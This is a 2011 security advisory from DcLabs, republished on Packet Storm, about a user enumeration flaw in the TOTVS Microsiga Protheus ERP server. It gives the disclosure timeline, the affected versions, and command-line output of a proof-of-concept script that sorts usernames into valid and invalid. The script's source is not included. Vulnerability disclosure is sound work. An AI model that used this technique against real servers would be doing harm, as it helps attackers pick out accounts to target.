TOTVS ERP Microsiga Protheus User Enumeration

2011-03-04T00:00:00
ID PACKETSTORM:98919
Type packetstorm
Reporter Flavio do Carmo Junior
Modified 2011-03-04T00:00:00

Description

                                        
                                            `[DCA-2011-0002]  
  
  
[Discussion]  
- DcLabs Security Research Group advises about following vulnerability(ies):  
  
[Software]  
- TOTVS ERP Microsiga Protheus  
  
[Vendor Product Description - Portuguese]  
- Software de Gestão - TOTVS  
A TOTVS é uma empresa de software, inovação, relacionamento e suporte  
à gestão, líder absoluta no Brasil, com 49,1% de share de mercado, e  
também na América Latina, com 31,2%*, é a maior empresa de softwares  
aplicativos sediada em países emergentes e a 7ª maior do mundo no  
setor.Tem mais de 25,2 mil clientes ativos, conta com o apoio de 9 mil  
participantes e está presente em 23 países.  
Proposta de Valor  
Tornar a empresa mais competitiva, com maior velocidade de decisão,  
oferecendo soluções que organizam, disciplinam, definem e impõem  
processos, armazenam dados, geram informação e auxiliam a gestão.  
- Fonte: http://totvs.com.br/web/guest/software  
  
[Advisory Timeline]  
- 02/Feb/2011 -> Initial contact to vendor, security contact request.  
- 03/Feb/2011 -> Security contact response.  
- 03/Feb/2011 -> First notification sent, release date set to March 01, 2011.  
- 04/Feb/2011 -> Vendor confirms notification received.  
- 21/Feb/2011 -> Situation report requested.  
- 01/Mar/2011 -> No vendor response.  
- 02/Mar/2011 -> Advisory published.  
  
[Bug Summary]  
- Users enumeration  
  
[Impact]  
- Low  
  
[Affected Version]  
- Microsiga Protheus 8 (20081215030344)  
- Microsiga Protheus 10 (20100812040605)  
- Other versions can also be affected but weren't tested.  
  
[Bug Description and Proof of Concept]  
- The server validates the user before asking for a password, thus we  
can keep trying usernames until we get a password prompt.  
  
- A Proof of Concept has been created:  
  
--- command line output begin ---  
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h  
usage: totvs_users_enumerator.py [options] [filename]  
-h for help  
  
options:  
--version show program's version number and exit  
-h, --help show this help message and exit  
-i IPADDRESS, --ipaddress=IPADDRESS  
Server IP address  
-p PORT, --port=PORT Port number (defaults to 1234)  
-t TARGET, --target=TARGET  
Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.  
Defaults to 10  
  
[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10  
--ipaddress 192.168.4.95 userlist  
Valid user: admin  
Invalid user: fakeuser  
Invalid user: nobody  
Valid user: jonas  
Valid user: fernando  
Invalid user: elvis  
--- command line output end ---  
  
----------------------------------------------------------------------------------------  
  
All flaws described here were discovered and researched by:  
Flávio do Carmo Júnior aka waKKu.  
DcLabs Security Research Group  
carmo.flavio <AT> dclabs <DOT> com <DOT> br  
  
[Workarounds]  
- An initial workaround was provided to block user after 3 failed  
password attempts, but it doesn't work against this kind of users  
enumeration.  
  
[Credits]  
DcLabs Security Research Group.  
  
--   
--  
Atenciosamente,  
  
Flávio do Carmo Júnior aka waKKu @ DcLabs  
Florianópolis/SC  
http://br.linkedin.com/in/carmoflavio  
http://0xcd80.wordpress.com  
`